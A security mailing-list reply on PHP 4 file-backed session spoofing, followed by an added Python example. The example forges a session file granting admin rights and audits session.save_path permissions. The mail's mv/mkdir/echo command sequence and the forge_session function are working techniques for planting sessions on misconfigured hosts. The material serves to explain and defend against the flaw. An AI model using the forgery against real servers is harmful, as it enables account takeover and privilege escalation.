Re: FW: PHP 4.x session spoofing

I reported this to bugs.php.net over a year ago (bug
#8189) and more recently I wrote an article for a PHP
website about the use of PHP sessions for
authentication, although that article has not yet been
published.

> Since PHP4 there is a native support for sessions,
> which was derived
> from the PHPLib. But instead of using a SQL backend
> to store these
> IDs, they chose to store them as files in /tmp.

You can configure PHP to store sessions in an SQL
database with session_set_save_handler.  That will add
to the complexity of your configuration, but will
probably not make it any more secure.  (How secure is
your SQL backend?)

> I suggest to create a directory called
> 
>   mkdir /tmp/php_sessions/

You're still in the /tmp directory, so there's still a
potential for misuse.  I could do "mv php_sessions
php_sessions_old; mkdir php_sessions; echo 'juicy
session data here' >
php_sessions/sess_g35g5g54gg45wg85" and create my own
sessions, assuming I know what data needs to be in the
session file.  

This may protect you from casual shell users, but what
about malicious PHP scripts, or other sites in a
virtual hosting environment?



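As an added illustration of the point made above (not code from the original mail or from PHP itself): the first function writes the kind of ready-made session file the mail describes, assuming PHP's default "php" serialize handler, which stores each variable as `name|<serialize() output>` with no separator, in a file named `sess_<id>` under `session.save_path`. The second audits a save path the way a practitioner would after reading this thread: the directory must be owned by the web server uid and mode 0700, and its parent must not be world-writable. One caveat the audit encodes: with the sticky bit set on the parent (as on a normal /tmp), only the owner of `php_sessions` can rename it away, so the exposure is whoever creates the name first plus any group/other write bits; without the sticky bit any local user can do the mv. The scratch tree, session ID and session contents are constructed for the demo.

```python
"""Forge a file-backed PHP session and audit session.save_path.

Added example, not from the original mail. Assumes PHP's default
session.serialize_handler ("php"): each variable is stored as
  name|<serialize() output>
with no separator between variables, in a file named sess_<id>.
"""
import os
import stat
import tempfile


def php_serialize(value):
    """Minimal PHP serialize() for the scalar/array types a login session holds."""
    if isinstance(value, bool):
        return "b:%d;" % (1 if value else 0)
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        # PHP counts bytes, not characters, in the string length
        return 's:%d:"%s";' % (len(value.encode("utf-8")), value)
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return "a:%d:{%s}" % (len(value), body)
    raise TypeError("unsupported type: %r" % type(value))


def encode_session(variables):
    """Serialize a dict the way the "php" session handler writes sess_* files."""
    return "".join("%s|%s" % (name, php_serialize(v)) for name, v in variables.items())


def forge_session(save_path, session_id, variables):
    """What the mail describes: drop a ready-made session file into save_path.
    Whoever can write here chooses both the session ID and its contents; the
    application then only has to be handed PHPSESSID=<session_id> in a cookie
    or URL to treat the request as that session."""
    path = os.path.join(save_path, "sess_" + session_id)
    with open(path, "w") as fh:
        fh.write(encode_session(variables))
    return path


def audit_save_path(path, web_uid):
    """Return a list of problems with a session.save_path directory.

    Checks the directory itself and its parent, because the attack in the
    mail is about the parent (/tmp) being world-writable: any local user can
    pre-create the name there, and if the parent lacks the sticky bit they can
    also rename an existing directory out of the way (the mv in the mail).
    """
    problems = []
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        return ["save_path is a symlink"]
    if not stat.S_ISDIR(st.st_mode):
        return ["save_path is not a directory"]
    if st.st_uid != web_uid:
        problems.append("not owned by the web server uid")
    if st.st_mode & (stat.S_IRWXG | stat.S_IRWXO):
        problems.append("group/other permissions set; want mode 0700")
    parent = os.path.dirname(os.path.abspath(path))
    pst = os.stat(parent)
    if pst.st_mode & stat.S_IWOTH:
        msg = "parent %s is world-writable" % parent
        if not pst.st_mode & stat.S_ISVTX:
            msg += " and has no sticky bit (directory can be renamed by any user)"
        problems.append(msg)
    return problems


def demo():
    """Constructed scenario in a scratch tree: a /tmp-like parent holding a
    carelessly created php_sessions, next to a properly locked-down directory.
    Returns (forged file contents, audit of the bad dir, audit of the good dir)."""
    base = tempfile.mkdtemp()          # mode 0700, owned by us; stands in for /var/lib
    me = os.getuid()                   # stands in for the web server uid
    tmp_like = os.path.join(base, "tmp")
    os.mkdir(tmp_like)
    os.chmod(tmp_like, 0o1777)         # like /tmp: world-writable with sticky bit
    bad = os.path.join(tmp_like, "php_sessions")
    os.mkdir(bad)
    os.chmod(bad, 0o777)               # the careless mkdir from the mail
    good = os.path.join(base, "sessions")
    os.mkdir(good)
    os.chmod(good, 0o700)
    forged = forge_session(bad, "deadbeef0123", {"uid": 1, "admin": True, "user": "alice"})
    with open(forged) as fh:
        contents = fh.read()
    return contents, audit_save_path(bad, me), audit_save_path(good, me)


if __name__ == "__main__":
    contents, bad_report, good_report = demo()
    print("forged session file:", contents)
    print("bad save_path:", bad_report)
    print("good save_path:", good_report)
```

The forged file for the demo's session reads `uid|i:1;admin|b:1;user|s:5:"alice";`, which is all an application that trusts `$_SESSION['admin']` needs to see. The audit flags the /tmp-style layout twice (world-writable parent, group/other bits on the directory) and passes the directory kept outside /tmp with mode 0700; run it against the real `session.save_path` with the web server's uid to check a live deployment.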
